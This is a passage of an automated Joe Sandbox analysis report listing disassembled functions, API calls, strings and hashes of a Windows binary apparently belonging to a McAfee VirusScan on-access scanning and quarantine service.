                                                                              control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 363 140003a4b-140003a65 SetEvent ResetEvent 361->363 364 140003ab4-140003abe 362->364 365 140003a90-140003aad #4 362->365 363->362 366 140003ae8-140003af9 364->366 367 140003ac0-140003ae1 #4 364->367 365->364 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                              • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                              • API String ID: 1021822269-3147033232
                                                                              • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                              • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                              • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                              • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                                              Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                              • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                              • API String ID: 883923345-381368982
                                                                              • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                              • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                              • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                              • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                              Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                              • String ID:
                                                                              • API String ID: 1613947383-0
                                                                              • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                              • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                              • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                              • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                              Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                              • String ID:
                                                                              • API String ID: 1995290849-0
                                                                              • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                              • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                              • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                              • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                              Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                              • String ID:
                                                                              • API String ID: 1995290849-0
                                                                              • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                              • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                              • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                              • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                              Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                              • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                              • API String ID: 93015348-1041928032
                                                                              • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                              • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                              • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                              • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                              Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                              • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                              • API String ID: 3682727354-300733478
                                                                              • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                              • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                              • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                              • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                              Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                              • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                              • API String ID: 2587151837-1427723692
                                                                              • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                              • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                              • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                              • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                              Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                              • String ID: SetDllDirectoryW$kernel32.dll
                                                                              • API String ID: 3184163350-3826188083
                                                                              • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                              • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                              • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                              • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                              Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcesslstrlen
                                                                              • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                              • API String ID: 3424473247-996641649
                                                                              • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                              • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                              • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                              • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                              Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: String$ByteCharMultiWide$ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1775797328-0
                                                                              • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                              • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                              • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                              • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                              Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                              • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                              • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                              • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1232609184-0
                                                                              • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                              • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                                              • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                                              • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                                              Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                                              • String ID: H
                                                                              • API String ID: 2107338056-2852464175
                                                                              • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                              • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                                              • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                                              • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                                              Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                                                              • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                                                              • API String ID: 1322048431-2685357988
                                                                              • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                              • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                                                              • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                                                              • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                                                              Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                                              • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                                                              • API String ID: 2984211723-3002863673
                                                                              • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                              • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                                                              • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                                                              • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                                                              Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                                                              • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                                                              • API String ID: 678758403-4129911376
                                                                              • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                              • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                                                              • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                                                              • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                                                              Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
